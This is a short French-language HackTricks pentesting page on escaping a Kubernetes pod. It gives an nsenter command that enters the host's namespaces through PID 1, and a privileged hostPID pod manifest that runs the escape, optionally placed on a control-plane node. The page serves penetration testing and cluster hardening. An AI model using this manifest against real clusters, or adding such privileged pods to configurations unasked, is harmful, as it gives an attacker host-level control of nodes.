Pod Escape Privileges

Soutenez HackTricks

Privilégié et hostPID

Avec ces privilèges, vous aurez accès aux processus hôtes et suffisamment de privilèges pour entrer dans l'espace de noms de l'un des processus hôtes. Notez que vous pourriez potentiellement ne pas avoir besoin de privilèges mais simplement de certaines capacités et d'autres contournements potentiels des défenses (comme apparmor et/ou seccomp).

Il suffit d'exécuter quelque chose comme ce qui suit pour vous échapper du pod :

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemple de configuration :

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Soutenez HackTricks

Last updated